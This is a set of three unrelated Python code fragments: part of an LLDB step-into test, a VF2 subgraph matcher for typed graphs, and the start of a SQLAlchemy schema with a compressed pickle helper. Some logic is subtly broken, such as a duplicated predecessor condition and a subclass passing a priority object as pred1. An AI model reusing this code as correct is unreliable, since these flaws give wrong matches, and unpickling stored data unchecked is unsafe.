thread.StepOver()
# See that we are still in b:
func_name = thread.GetFrameAtIndex(0).GetFunctionName()
self.assertTrue(
func_name == "b",
"Should be in 'b', were in %s" %
(func_name))
# Okay, now if we continue, we will finish off our function call and we
# should end up back in "a" as if nothing had happened:
process.Continue()
self.assertTrue(thread.GetFrameAtIndex(
0).GetLineEntry().GetLine() == current_line)
self.assertTrue(thread.GetFrameAtIndex(
0).GetLineEntry().GetFileSpec() == current_file)
# Now we are going to test step in targeting a function:
break_in_b.SetEnabled(False)
break_before_complex_1 = target.BreakpointCreateBySourceRegex(
'// Stop here to try step in targeting b.', self.main_source_spec)
self.assertTrue(break_before_complex_1, VALID_BREAKPOINT)
break_before_complex_2 = target.BreakpointCreateBySourceRegex(
'// Stop here to try step in targeting complex.', self.main_source_spec)
self.assertTrue(break_before_complex_2, VALID_BREAKPOINT)
break_before_complex_3 = target.BreakpointCreateBySourceRegex(
'// Stop here to step targeting b and hitting breakpoint.', self.main_source_spec)
self.assertTrue(break_before_complex_3, VALID_BREAKPOINT)
break_before_complex_4 = target.BreakpointCreateBySourceRegex(
'// Stop here to make sure bogus target steps over.', self.main_source_spec)
self.assertTrue(break_before_complex_4, VALID_BREAKPOINT)
threads = lldbutil.continue_to_breakpoint(
process, break_before_complex_1)
self.assertTrue(len(threads) == 1)
thread = threads[0]
break_before_complex_1.SetEnabled(False)
thread.StepInto("b")
self.assertTrue(thread.GetFrameAtIndex(0).GetFunctionName() == "b")
# Now continue out and stop at the next call to complex. This time
# step all the way into complex:
threads = lldbutil.continue_to_breakpoint(
process, break_before_complex_2)
self.assertTrue(len(threads) == 1)
thread = threads[0]
break_before_complex_2.SetEnabled(False)
thread.StepInto("complex")
self.assertTrue(thread.GetFrameAtIndex(
0).GetFunctionName() == "complex")
# Now continue out and stop at the next call to complex. This time
# enable breakpoints in a and c and then step targeting b:
threads = lldbutil.continue_to_breakpoint(
process, break_before_complex_3)
self.assertTrue(len(threads) == 1)
thread = threads[0]
break_before_complex_3.SetEnabled(False)
break_at_start_of_a = target.BreakpointCreateByName('a')
break_at_start_of_c = target.BreakpointCreateByName('c')
thread.StepInto("b")
threads = lldbutil.get_stopped_threads(
process, lldb.eStopReasonBreakpoint)
self.assertTrue(len(threads) == 1)
thread = threads[0]
stop_break_id = thread.GetStopReasonDataAtIndex(0)
self.assertTrue(stop_break_id == break_at_start_of_a.GetID()
or stop_break_id == break_at_start_of_c.GetID())
break_at_start_of_a.SetEnabled(False)
break_at_start_of_c.SetEnabled(False)
process.Continue()
self.assertTrue(thread.GetFrameAtIndex(0).GetFunctionName() == "b")
# Now continue out and stop at the next call to complex. This time
# enable breakpoints in a and c and then step targeting b:
threads = lldbutil.continue_to_breakpoint(
process, break_before_complex_4)
self.assertTrue(len(threads) == 1)
thread = threads[0]
break_before_complex_4.SetEnabled(False)
thread.StepInto("NoSuchFunction")
self.assertTrue(thread.GetFrameAtIndex(0).GetFunctionName() == "main")
|
|
import sys
from .himesis import Himesis
from .himesis_utils import standardize_name, is_RAM_attribute, to_non_RAM_attribute, get_preds_and_succs
from pyramify.ramify_actions import get_default_match_code
class Priority(object):
"""
Implements heuristics for the HimesisMatcher algorithm.
Determines the order in which the candidate pairs should be computed.
By default, the order is the index order of the nodes in igraph.
To refine this heuristic order, you should sub-class Priority and override its methods.
"""
def __init__(self):
"""
Implements heuristics for the HimesisMatcher algorithm.
Determines the order in which the candidate pairs should be computed.
By default, the order is the index order of the nodes in igraph.
To refine this heuristic order, you should sub-class Priority and override its methods.
"""
self.source_graph = None
self.pattern_graph = None
def cache_info(self, source_graph, pattern_graph):
"""
Pre-computes any information required by the order and order_all methods
@param source_graph: The source graph.
@param pattern_graph: The pattern graph.
"""
pass
def order_source(self, candidate_list):
"""
Specifies the order for the terminal sets for the source graph.
@param candidate_list: The list of possible candidates.
"""
return sorted(candidate_list)
def order_pattern(self, candidate_list):
"""
Specifies the order for the terminal sets for the pattern graph.
@param candidate_list: The list of possible candidates.
"""
return sorted(candidate_list)
def order_all_source(self, candidate_list):
"""
Specifies the order for all source nodes.
@param candidate_list: The list of possible candidates.
"""
return candidate_list
def order_all_pattern(self, candidate_list):
"""
Specifies the order for all pattern nodes.
@param candidate_list: The list of possible candidates.
"""
return candidate_list
class HimesisMatcher(object):
"""
Represents a pattern matching algorithm for typed attributed multi-graphs.
The pattern matching algorithm is based on VF2.
"""
def __init__(self, source_graph, pattern_graph, pred1={}, succ1={}, pred2 = {}, succ2 = {}, superclasses_dict = {}):
"""
Represents a pattern matching algorithm for typed attributed multi-graphs.
@param source_graph: The source graph.
@param pattern_graph: The pattern graph.
@param priority: Instance of a sub-class of the Priority class.
It is used to determine the order in which the candidate pairs should be computed.
@param pred1: Pre-built dictionary of predecessors in the source graph.
@param succ1: Pre-built dictionary of successors in the source graph.
"""
try:
src_eqs = source_graph["equations"]
except KeyError:
print("Graph has no equations array: " + source_graph.name)
src_eqs = []
try:
patt_eqs = pattern_graph["equations"]
except KeyError:
print("Graph has no equations array: " + pattern_graph.name)
patt_eqs = []
try:
patt_labels = pattern_graph.vs["MT_label__"]
except KeyError:
patt_labels = []
self.src_eqs_constant = {}
self.src_eqs_variable = []
for eq in src_eqs:
if eq[1][0] == "constant":
node_num = eq[0][0]
attr = eq[0][1]
try:
self.src_eqs_constant[node_num].append((attr, eq[1][1]))
except KeyError:
self.src_eqs_constant[node_num] = [(attr, eq[1][1])]
else:
self.src_eqs_variable.append(eq)
self.patt_eqs_constant = {}
self.patt_eqs_variable = []
for eq in patt_eqs:
if eq[1][0] == "constant":
node_label = str(eq[0][0])
attr = eq[0][1]
#print("Node label: " + str(node_label))
#print("Labels: " + str(patt_labels))
node_num = patt_labels.index(node_label)
try:
self.patt_eqs_constant[node_num].append((attr, eq[1][1]))
except KeyError:
self.patt_eqs_constant[node_num] = [(attr, eq[1][1])]
else:
self.patt_eqs_variable.append(eq)
# print("\n")
# print("Src constant eqs: " + str(self.src_eqs_constant))
# print("Src variable eqs: " + str(self.src_eqs_variable))
# print("Patt constant eqs: " + str(self.patt_eqs_constant))
# print("Patt variable eqs: " + str(self.patt_eqs_variable))
self.superclasses_dict = superclasses_dict
self.G1 = source_graph
self.G2 = pattern_graph
self.pred1 = pred1
self.succ1 = succ1
self.G1_vcount = self.G1.vcount()
self.G2_vcount = self.G2.vcount()
# removed priority for speed
#assert(isinstance(priority, Priority))
#self.priority = priority
#self.priority.source_graph = source_graph
#self.priority.pattern_graph = pattern_graph
# Set recursion limit
self.old_recursion_limit = sys.getrecursionlimit()
expected_max_recursion_level = self.G2_vcount
if self.old_recursion_limit < 1.5 * expected_max_recursion_level:
# Give some breathing room
sys.setrecursionlimit(int(1.5 * expected_max_recursion_level))
# Initialize the state
self.initialize()
# Check whether we are considering multi-graph
# if reduce(lambda x,y: x or y, self.G2.is_multiple()):
# self.cache_info_multi(self.G1_nodes, self.G2_nodes)
# Scan the two graphs to cache required information.
# Typically stores the results of expensive operation on the graphs.
# This speeds up the algorithm significantly.
# (disabled)
# self.cache_info()
# Memoize the predecessor & successor information:
# for each node store the number of neighbours and the list
#igraph.IN = 2, igraph.OUT = 1
if not self.pred1 or not self.succ1:
self.pred1, self.succ1 = get_preds_and_succs(self.G1)
self.pred2 = pred2
self.succ2 = succ2
if not self.pred2 or not self.succ2:
self.pred2, self.succ2 = get_preds_and_succs(self.G2)
self.has_super = None
if self.G1_vcount > 0 and self.G2_vcount > 0:
#keep track of the metamodels
self.mm1 = self.G1.vs["mm__"]
self.mm2 = [mm[8:] for mm in self.G2.vs["mm__"]]
if self.superclasses_dict:
self.src_has_supertype = [child_mm in self.superclasses_dict for child_mm in self.mm1]
else:
self.src_has_supertype = [False] * self.G1_vcount
#ignore an empty directory
if self.superclasses_dict:
self.has_super = [mm in self.superclasses_dict.keys() for mm in self.mm1]
def cache_info(self):
"""
Cache information on the nodes.
Typically stores the results of expensive operation on the graphs.
This speeds up the algorithm significantly.
"""
# Cache individual nodes
self.G1_nodes = self.G1.node_iter()
self.G2_nodes = self.G2.node_iter()
# Cache any further data used for the heuristic prioritization for computing the candidate pair
# This is done when initializing the priority class
self.priority.cache_info(self.G1, self.G2)
def reset_recursion_limit(self):
"""
Restores the recursion limit.
"""
sys.setrecursionlimit(self.old_recursion_limit)
def initialize(self):
"""
(Re)Initializes the state of the algorithm.
"""
#=======================================================================
# The algorithm is based on VF2.
# The following are the data-structures used:
# - M_1: the current partial mapping from G1 to G2
# - M_2: the current partial mapping from G2 to G1
# - T1_in: the in-neighbours of the nodes in M_1
# - T2_in: the in-neighbours of the nodes in M_2
# - T1_out: the out-neighbours of the nodes in M_1
# - T2_out: the out-neighbours of the nodes in M_2
#=======================================================================
# core_1[n] contains the index of the node m paired with n, if n is in the mapping
self.core_1 = {} # This is M_1
# core_2[m] contains the index of the node n paired with m, if m is in the mapping
self.core_2 = {} # This is M_2
# The value stored is the depth of the search tree when the node became part of the corresponding set
# Non-zero if n is in M_1 or in T_1^{in}
self.in_1 = {}
# Non-zero if n is in M_1 or in T_1^{out}
self.out_1 = {}
# Non-zero if m is in M_2 or in T_2^{in}
self.in_2 = {}
# Non-zero if m is in M_2 or in T_2^{out}
self.out_2 = {}
# To improve the performance, we also store the following vectors
# Non-zero if n is in M_1 or in T_1^{in} or in T_1^{out}
self.inout_1 = {}
# Non-zero if n is in M_2 or in T_2^{in} or in T_2^{out}
self.inout_2 = {}
# Prepare the necessary data structures required for backtracking
self.state = self.save()#HimesisMatcherState(self)
# Provide a convenient way to access the isomorphism mapping.
self.mapping = self.core_2.copy()
def are_compatibile(self, src_node, patt_node):
"""
Verifies if a candidate pair is compatible.
More specifically, verify degree and meta-model compatibility.
@param src_node: The candidate from the source graph.
@param patt_node: The candidate from the pattern graph.
"""
# WARNING:
# MOVED TO _MATCH FUNCTION!
# First check if they are of the same type
#if sourceNode["mm__"] == to_non_RAM_attribute(patternNode["mm__"]):
#Assumption: patternNode["mm__"] always starts with "MT_pre__"
#MT_pre taken off when creating self.mm2
#if sourceNode["mm__"] == patternNode["mm__"][8:]:
sourceMM = self.mm1[src_node]
targetMM = self.mm2[patt_node]
if sourceMM == targetMM:
# Then check for the degree compatibility
return (self.pred2[patt_node][0] <= self.pred1[src_node][0]
and self.succ2[patt_node][0] <= self.succ1[src_node][0])
# Otherwise, first check for the degree compatibility
elif not (self.pred2[patt_node][0] <= self.pred1[src_node][0]
and self.succ2[patt_node][0] <= self.succ1[src_node][0]):
return False
if self.src_has_supertype[src_node]:
return targetMM in self.superclasses_dict[sourceMM]
#
# # Then check sub-types compatibility
# if self.patt_has_subtype[patt_node]:
# for subtype in self.G2.vs[patt_node]['MT_subtypes__']:
# if sourceMM == subtype[8:]:
# return True
return False
def candidate_pairs_iter(self):
"""
Iterator over candidate pairs of nodes in G1 and G2, according to the VF2 algorithm.
The candidate pairs have all passed the compatibility check before output.
@return: The candidate pair (source node, pattern node)
"""
#=======================================================================
# Here we compute P(s) = (p1,p2) the candidate pair
# for the current partial mapping M(s).
#=======================================================================
# First try the nodes that are in both Ti_in and Ti_out
if len(self.inout_1) > len(self.core_1) and len(self.inout_2) > len(self.core_2):
for patt_node in sorted(self.inout_2):
if patt_node not in self.core_2:
break
for src_node in sorted(self.inout_1):
if src_node not in self.core_1:
yield src_node, patt_node
# If T1_out and T2_out are both non-empty:
# P(s) = T1_out x {min T2_out}
elif len(self.out_1) > len(self.core_1) and len(self.out_2) > len(self.core_2):
for patt_node in sorted(self.out_2):
if patt_node not in self.core_2:
break
for src_node in sorted(self.out_1):
if src_node not in self.core_1:
yield src_node, patt_node
# If T1_in and T2_in are both non-empty:
# P(s) = T1_in x {min T2_in}
elif len(self.in_1) > len(self.core_1) and len(self.in_2) > len(self.core_2):
for patt_node in sorted(self.in_2):
if patt_node not in self.core_2:
break
for src_node in sorted(self.in_1):
if src_node not in self.core_1:
yield src_node, patt_node
# If all terminal sets are empty:
# P(s) = (N_1 - M_1) x {min (N_2 - M_2)}
else:
for patt_node in range(self.G2_vcount):
if patt_node not in self.core_2:
break
for src_node in range(self.G1_vcount):
if src_node not in self.core_1:
yield src_node, patt_node
def are_syntactically_feasible(self, src_node, patt_node):
"""
Determines whether the two nodes are syntactically feasible,
i.e., it ensures that adding this candidate pair does not make it impossible to find a total mapping.
@param src_node: The candidate from the source graph.
@param patt_node: The candidate from the pattern graph.
@return: True if they are syntactically feasible, False otherwise.
"""
#=======================================================================
# The syntactic feasibility considers the topology of the two graphs.
# It verifies that edges directly or indirectly connected to M(s + P(s))
# does not violate the subgraph matching conditions.
#=======================================================================
# Check for self-loops
# e1, e2 = -1, -1
# if patt_node in self.succ2[patt_node] or patt_node in self.pred2[patt_node]:
# if src_node in self.succ1[src_node] or src_node in self.pred1[src_node]:
# e1 = self.G1.get_eid(src_node, src_node)
# e2 = self.G2.get_eid(patt_node, patt_node)
# if self.G1.count_multiple(e1) < self.G2.count_multiple(e2):
# return False
# else:
# return False
# Counters for in and out edges found
in1 = 0
in2 = 0
out1 = 0
out2 = 0
inout1 = 0
inout2 = 0
# Checks if successors are compatible
for successor2 in self.succ2[patt_node][1]:
#tmp = self.G2.predecessors(successor2)
# tmp = self.pred2[successor2][1]
# self.pred2[successor2] = (len(tmp), tmp)
# tmp = self.G2.successors(successor2)
# self.succ2[successor2] = (len(tmp), tmp)
if successor2 not in self.core_2:
for successor1 in self.succ1[src_node][1]:
# tmp = self.G1.predecessors(successor1)
# self.pred1[successor1] = (len(tmp), tmp)
# tmp = self.G1.successors(successor1)
# self.succ1[successor1] = (len(tmp), tmp)
if (self.succ2[successor2][0] <= self.succ1[successor1][0]
and self.pred2[successor2][0] <= self.pred1[successor1][0]
and successor1 not in self.core_1):
break
else:
return False
# They are compatible, so update the counters of the pattern node
if self.pred2[successor2][1]:
in2 += 1
if self.succ2[successor2][1]:
out2 += 1
if not self.pred2[successor2][1] and not self.succ2[successor2][1]:
inout2 += 1
else:
if self.core_2[successor2] not in self.succ1[src_node][1]:
return False
# Checks if predecessors are compatible
for predecessor2 in self.pred2[patt_node][1]:
# tmp = self.G2.predecessors(predecessor2)
# self.pred2[predecessor2] = (len(tmp), tmp)
# tmp = self.G2.successors(predecessor2)
# self.succ2[predecessor2] = (len(tmp), tmp)
if predecessor2 not in self.core_2:
for predecessor1 in self.pred1[src_node][1]:
# tmp = self.G1.predecessors(predecessor1)
# self.pred1[predecessor1] = (len(tmp), tmp)
# tmp = self.G1.successors(predecessor1)
# self.succ1[predecessor1] = (len(tmp), tmp)
if (self.pred2[predecessor2][0] <= self.pred1[predecessor1][0]
and self.pred2[predecessor2][0] <= self.pred1[predecessor1][0]
and predecessor1 not in self.core_1):
break
else:
return False
# They are compatible, so update the counters of the pattern node
if self.pred2[predecessor2][1]:
in2 += 1
if self.pred2[predecessor2][1]:
out2 += 1
if not self.pred2[predecessor2][1] and not self.pred2[predecessor2][1]:
inout2 += 1
else:
if self.core_2[predecessor2] not in self.pred1[src_node][1]:
return False
# Now compute the counters of the source node
for successor1 in self.succ1[src_node][1]:
if successor1 not in self.core_1:
# tmp = self.G1.predecessors(successor1)
# self.pred1[successor1] = (len(tmp), tmp)
# tmp = self.G1.successors(successor1)
# self.succ1[successor1] = (len(tmp), tmp)
if self.pred1[successor1][1]:
in1 += 1
if self.succ1[successor1][1]:
out1 += 1
if not self.pred1[successor1][1] and not self.succ1[successor1][1]:
inout1 += 1
# For induced matches
#else:
# if self.core_1[successor1] not in self.succ2[patt_node]:
# return False
# Now compute the counters of the source node
for predecessor1 in self.pred1[src_node][1]:
if predecessor1 not in self.core_1:
# tmp = self.G1.predecessors(predecessor1)
# self.pred1[predecessor1] = (len(tmp), tmp)
# tmp = self.G1.successors(predecessor1)
# self.succ1[predecessor1] = (len(tmp), tmp)
if self.pred1[predecessor1][1]:
in1 += 1
if self.pred1[predecessor1][1]:
out1 += 1
if not self.pred1[predecessor1][1] and not self.pred1[predecessor1][1]:
inout1 += 1
# For induced matches
#else:
# if self.core_1[predecessor1] not in self.pred2[patt_node]:
# return False
# Finally, verify if all counters satisfy the subgraph matching conditions
# For induced matches
#return in2 <= in1 and out2 <= out1 and inout2 <= inout1
return in2 <= in1 and out2 <= out1 and (in2 + out2 + inout2) <= (in1 + out1 + inout1)
def are_semantically_feasible(self, src_node_num, patt_node_num):
"""
Determines whether the two nodes are syntactically feasible,
i.e., it ensures that adding this candidate pair does not make it impossible to find a total mapping.
@param src_node: The candidate from the source graph.
@param patt_node: The candidate from the pattern graph.
@return: True if they are semantically feasible, False otherwise.
"""
#=======================================================================
# This feasibility check looks at the data stored in the pair of candidates.
# It verifies that all attribute constraints are satisfied.
#=======================================================================
src_node = self.G1.vs[src_node_num]
patt_node = self.G2.vs[patt_node_num]
# print("\n")
# print("Src node: " + str(src_node_num))
# print("Src constant: " + str(self.src_eqs_constant))
# print("Patt node: " + str(patt_node_num))
# print("Patt constant: " + str(self.patt_eqs_constant))
src_equations = []
if src_node_num in self.src_eqs_constant:
src_equations = self.src_eqs_constant[src_node_num]
if patt_node_num in self.patt_eqs_constant:
patt_equations = self.patt_eqs_constant[patt_node_num]
#print("Source Eq: " + str(src_equation))
#print("Pattern Eq: " + str(patt_equations))
for patt_eq in patt_equations:
patt_attr = patt_eq[0]
patt_value = patt_eq[1]
found = False
for (src_attr, src_value) in src_equations:
if patt_attr == src_attr:
if patt_value == src_value:
found = True
break
else:
#print("Equations do not match")
return False
if found:
continue
try:
if src_node[patt_attr] != patt_value:
#print("Couldn't find value, found " + str(src_node[patt_attr]))
#print("Patt eq: " + str(patt_eq))
return False
except KeyError:
#print("Couldn't find " + patt_attr + " on node " + src_node["mm__"])
#the attribute does not exist on the node
return False
# Check for attributes value/constraint
for attr in patt_node.attribute_names():
# Attribute constraints are stored as attributes in the pattern node.
# The attribute must be prefixed by a specific keyword
if not attr.startswith("MT_pre__"):
continue
# If the attribute does not "in theory" exist
# because igraph actually stores all attribute names in all nodes.
elif patt_node[attr] is None:
continue
if patt_node[attr] == get_default_match_code():
continue
attr_name = attr[8:]
#methName = self.G2.get_attr_constraint_name(patt_node.index, attr)
methName = 'eval_%s%s' % (attr_name, patt_node['MT_label__'])
checkConstraint = getattr(self.G2, methName, None)
# The following assumes that every attribute constraint is defined on the pattern graph
# (and not on the pattern node itself)
#if callable(checkConstraint):
try:
# This is equivalent to: if not eval_attrLbl(attr_value, currNode)
if not checkConstraint(src_node[attr_name], src_node):
return False
except Exception as e:
#TODO: This should be a TransformationLanguageSpecificException
print("Source graph: " + self.G1.name)
print("Pattern graph: " + self.G2.name)
for n in self.G1.vs:
try:
print("Type: " + n["type"])
print("MM: " + n["mm__"])
except KeyError:
pass
raise Exception("An error has occurred while checking the constraint of the attribute '" + attr_name + "'"
+ " in node '" + src_node["mm__"] + "' in graph: '" + self.G1.name + "'", e)
#assume the method is callable
#else:
# raise Exception('The method %s was not found in the pattern graph' % methName)
return True
#@profile
def _match(self):
"""
Extends the pattern matching mapping.
This method is recursively called to determine if the pattern G2
can be completely matched on G1.
@return: The mapping {pattern node index : source node index}
"""
#=======================================================================
# It cleans up the class variables after each recursive call.
# If a match is found, we yield the mapping.
#=======================================================================
# Base condition when a complete match is found
if len(self.core_2) == self.G2_vcount:
# Save the final mapping, otherwise garbage collection deletes it
self.mapping = self.core_2.copy()
yield self.mapping
else:
for src_node, patt_node in self.candidate_pairs_iter():
# Cache the predecessors and successors of the candidate pairs on the fly
# self.pred1, self.succ1, self.pred2, self.succ2 = {}, {}, {}, {}
# self.pred1[src_node] = (len(self.G1.predecessors(src_node)), self.G1.predecessors(src_node))
# self.succ1[src_node] = (len(self.G1.successors(src_node)), self.G1.successors(src_node))
# self.pred2[patt_node] = (len(self.G2.predecessors(patt_node)), self.G2.predecessors(patt_node))
# self.succ2[patt_node] = (len(self.G2.successors(patt_node)), self.G2.successors(patt_node))
# Check for the degree compatibility
if not (self.pred2[patt_node][0] <= self.pred1[src_node][0]
and self.succ2[patt_node][0] <= self.succ1[src_node][0]):
continue
sourceMM = self.mm1[src_node]
targetMM = self.mm2[patt_node]
if sourceMM != targetMM:
if not self.src_has_supertype[src_node] or targetMM not in self.superclasses_dict[sourceMM]:
continue
#if self.are_compatibile(src_node, patt_node):
if self.are_syntactically_feasible(src_node, patt_node):
if self.are_semantically_feasible(src_node, patt_node):
# Recursive call, adding the feasible state
newstate = self.save(src_node, patt_node)
#newstate = HimesisMatcherState(self, src_node, patt_node)
for mapping in self._match():
yield mapping
# restore data structures
self.restore(newstate)
#newstate.restore()
def has_match(self, context={}):
"""
Determines if the pattern graph can be matched on the source graph.
@param context: Optional predefined mapping {string:uuid}.
@return: True if a match is found, False otherwise.
"""
try:
self.match_iter(context).next()
return True
except StopIteration:
return False
def match_iter(self, context={}):
"""
Iterator over matchings of the pattern graph on the source graph.
@param context: Optional predefined mapping {pattern node index: source node index}.
@return: The mapping {pattern node index : source node index}.
"""
self.initialize()
for p in context:
if self.are_semantically_feasible(context[p], p):
self.save(context[p], p)
else:
# Additional constraints on the pivot nodes are not satisfied: no match is possible
return
for mapping in self._match():
yield mapping
def save(self, src_node=None, patt_node=None):
"""
Internal representation of state for the HimesisMatcher class.
@param matcher: The HimesisMatcher object.
@param src_node: The source node of the candidate pair.
@param src_node: The pattern node of the candidate pair.
"""
# Initialize the last stored node pair.
saved_src_node = None
saved_patt_node = None
depth = 0
if src_node is None or patt_node is None:
# Then we reset the class variables
self.core_1 = {}
self.core_2 = {}
self.in_1 = {}
self.in_2 = {}
self.out_1 = {}
self.out_2 = {}
self.inout_1 = {}
self.inout_2 = {}
# Watch out! src_node == 0 should evaluate to True.
if src_node is not None and patt_node is not None:
# Add the node pair to the isomorphism mapping.
self.core_1[src_node] = patt_node
self.core_2[patt_node] = src_node
# Store the node that was added last.
saved_src_node = src_node
saved_patt_node = patt_node
# Now we must update the other four vectors.
# We will add only if it is not in there already!
depth = len(self.core_1)
# First we add the new nodes...
for vector in (self.in_1, self.out_1, self.inout_1):
if src_node not in vector:
vector[src_node] = depth
for vector in (self.in_2, self.out_2, self.inout_2):
if patt_node not in vector:
vector[patt_node] = depth
# Now we add every other node...
# Updates for T_1^{in}
new_nodes_in = []
# Updates for T_1^{out}
new_nodes_out = []
for node in self.core_1:
new_nodes_in += self.pred1[node][1]
new_nodes_out += self.succ1[node][1]
for node in set(new_nodes_in):
if node not in self.in_1 and node not in self.core_1:
self.in_1[node] = depth
for node in set(new_nodes_out):
if node not in self.out_1 and node not in self.core_1:
self.out_1[node] = depth
# Updates for T_1^{inout}
# & returns the intersection
for node in set(self.in_1.keys()).intersection(set(self.out_1.keys())):
if node not in self.inout_1:
self.inout_1[node] = depth
# Updates for T_2^{in}
new_nodes_in = []
# Updates for T_2^{out}
new_nodes_out = []
for node in self.core_2:
new_nodes_in += self.pred2[node][1]
new_nodes_out += self.succ2[node][1]
for node in set(new_nodes_in):
if node not in self.in_2 and node not in self.core_2:
self.in_2[node] = depth
for node in set(new_nodes_out):
if node not in self.out_2 and node not in self.core_2:
self.out_2[node] = depth
# Updates for T_2^{inout}
# & returns the intersection
for node in set(self.in_2.keys()).intersection(set(self.out_2.keys())):
if node not in self.inout_2:
self.inout_2[node] = depth
return (saved_src_node, saved_patt_node, depth)
def restore(self, state):
"""
Deletes the HimesisMatcherState object and restores the class variables.
"""
saved_src_node, saved_patt_node, depth = state
# First we remove the node that was added from the core vectors.
# Watch out! src_node == 0 should evaluate to True.
if saved_src_node is not None and saved_patt_node is not None:
del self.core_1[saved_src_node]
del self.core_2[saved_patt_node]
# Now we revert the other four vectors.
# Thus, we delete all entries which have this depth level.
for vector in (self.in_1, self.in_2, self.out_1, self.out_2, self.inout_1, self.inout_2):
vector_keys = list(vector.keys())
for node in vector_keys:
if vector[node] == depth:
del vector[node]
class HimesisMatcherState(object):
"""
Internal representation of state for the HimesisMatcher class.
This class is used internally by the HimesisMatcher class. It is used
only to store state specific data. There will be at most V(pattern graph) of
these objects in memory at a time, due to the depth-first search
strategy employed by the VF2 algorithm.
"""
def __init__(self, matcher, src_node=None, patt_node=None):
"""
Internal representation of state for the HimesisMatcher class.
@param matcher: The HimesisMatcher object.
@param src_node: The source node of the candidate pair.
@param src_node: The pattern node of the candidate pair.
"""
self.matcher = matcher
# Initialize the last stored node pair.
self.src_node = None
self.patt_node = None
self.depth = len(matcher.core_1)
if src_node is None or patt_node is None:
# Then we reset the class variables
matcher.core_1 = {}
matcher.core_2 = {}
matcher.in_1 = {}
matcher.in_2 = {}
matcher.out_1 = {}
matcher.out_2 = {}
matcher.inout_1 = {}
matcher.inout_2 = {}
# Watch out! src_node == 0 should evaluate to True.
if src_node is not None and patt_node is not None:
# Add the node pair to the isomorphism mapping.
matcher.core_1[src_node] = patt_node
matcher.core_2[patt_node] = src_node
# Store the node that was added last.
self.src_node = src_node
self.patt_node = patt_node
# Now we must update the other four vectors.
# We will add only if it is not in there already!
self.depth = len(matcher.core_1)
# First we add the new nodes...
for vector in (matcher.in_1, matcher.out_1, matcher.inout_1):
if src_node not in vector:
vector[src_node] = self.depth
for vector in (matcher.in_2, matcher.out_2, matcher.inout_2):
if patt_node not in vector:
vector[patt_node] = self.depth
# Now we add every other node...
# Updates for T_1^{in}
new_nodes_in = []
# Updates for T_1^{out}
new_nodes_out = []
for node in matcher.core_1:
new_nodes_in += matcher.pred1[node][1]
new_nodes_out += matcher.succ1[node][1]
for node in set(new_nodes_in):
if node not in matcher.in_1 and node not in matcher.core_1:
matcher.in_1[node] = self.depth
for node in set(new_nodes_out):
if node not in matcher.out_1 and node not in matcher.core_1:
matcher.out_1[node] = self.depth
# Updates for T_1^{inout}
# & returns the intersection
for node in set(matcher.in_1.keys()).intersection(set(matcher.out_1.keys())):
if node not in matcher.inout_1:
matcher.inout_1[node] = self.depth
# Updates for T_2^{in}
new_nodes_in = []
# Updates for T_2^{out}
new_nodes_out = []
for node in matcher.core_2:
new_nodes_in += matcher.pred2[node][1]
new_nodes_out += matcher.succ2[node][1]
for node in set(new_nodes_in):
if node not in matcher.in_2 and node not in matcher.core_2:
matcher.in_2[node] = self.depth
for node in set(new_nodes_out):
if node not in matcher.out_2 and node not in matcher.core_2:
matcher.out_2[node] = self.depth
# Updates for T_2^{inout}
# & returns the intersection
for node in set(matcher.in_2.keys()).intersection(set(matcher.out_2.keys())):
if node not in matcher.inout_2:
matcher.inout_2[node] = self.depth
def restore(self):
"""
Deletes the HimesisMatcherState object and restores the class variables.
"""
# First we remove the node that was added from the core vectors.
# Watch out! src_node == 0 should evaluate to True.
if self.src_node is not None and self.patt_node is not None:
del self.matcher.core_1[self.src_node]
del self.matcher.core_2[self.patt_node]
# Now we revert the other four vectors.
# Thus, we delete all entries which have this depth level.
for vector in (self.matcher.in_1, self.matcher.in_2, self.matcher.out_1, self.matcher.out_2, self.matcher.inout_1, self.matcher.inout_2):
vector_keys = list(vector.keys())
for node in vector_keys:
if vector[node] == self.depth:
del vector[node]
class VF2(HimesisMatcher):
"""
The native VF2 algorithm for subgraph isomorphism.
"""
def __init__(self, G1, G2):
"""
The native VF2 algorithm for subgraph isomorphism.
@param G1: The bigger graph.
@param G2: The smaller graph.
"""
HimesisMatcher.__init__(self, G1, G2)
def match_iter(self):
"""
Iterator over mappings of G2 on a subgraph of G1.
@return: The mapping {pattern node uuid : source node uuid}.
"""
for mapping in self.G1.get_subisomorphisms_vf2(self.G2):
# mapping is a list for which mapping[i] is the source node index mapped to the pattern node index i
# So we need to convert it into a dictionary
match = {}
for pattern_node, src_node in enumerate(mapping):
match[pattern_node] = src_node
yield match
class SubgraphIsoMatcher(HimesisMatcher):
"""
The VF2 algorithm for subgraph isomorphism as implemented in HimesisMatcher.
Basically this is the same as HimesisMatcher but no node data is taken into consideration.
"""
def __init__(self, source_graph, pattern_graph, priority=Priority()):
"""
The VF2 algorithm for subgraph isomorphism as implemented in HimesisMatcher.
Basically this is the same as HimesisMatcher but no node data is taken into consideration.
"""
HimesisMatcher.__init__(self, source_graph, pattern_graph, priority)
def are_compatibile(self, src_node, patt_node):
"""
Verifies if a candidate pair is compatible.
More specifically, verify degree compatibility.
@param src_node: The candidate from the source graph.
@param patt_node: The candidate from the pattern graph.
"""
return (self.pred2[patt_node][0] <= self.pred1[src_node][0]
and self.succ2[patt_node][0] <= self.succ1[src_node][0])
def are_semantically_feasible(self, sourceNode, patternNode):
"""
Since no data is considered, the graphs have no semantics.
@param src_node: The candidate from the source graph.
@param patt_node: The candidate from the pattern graph.
@return: True always.
"""
return True
|
|
from future import standard_library
standard_library.install_aliases()
from builtins import object
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy import create_engine
from sqlalchemy.orm import relationship
from sqlalchemy import (
Column, Integer, String, DateTime, Boolean, Enum,
Float, PickleType, ForeignKey, Text, func, Index)
import sqlalchemy
import re
from pickle import dumps, loads
from gzip import zlib
class CompressedPickler(object):
@classmethod
def dumps(cls, obj, protocol=2):
s = dumps(obj, protocol)
sz = zlib.compress(s, 9)
if len(sz) < len(s):
return sz
else:
return s
@classmethod
def loads(cls, string):
try:
s = zlib.decompress(string)
except:
s = string
return loads(s)
class Base(object):
@declared_attr
def __tablename__(cls):
"""convert camel case to underscores"""
return re.sub(r'([a-z])([A-Z])', r'\1_\2', cls.__name__).lower()
id = Column(Integer, primary_key=True, index=True)
Base = declarative_base(cls=Base)
class _Meta(Base):
""" meta table to track current version """
db_version = Column(String(128))
@classmethod
def has_version(cls, session, version):
try:
session.flush()
session.query(_Meta).filter_by(db_version=version).one()
return True
except sqlalchemy.orm.exc.NoResultFound:
return False
@classmethod
def get_version(cls, session):
try:
session.flush()
x = session.query(_Meta).one()
return x.db_version
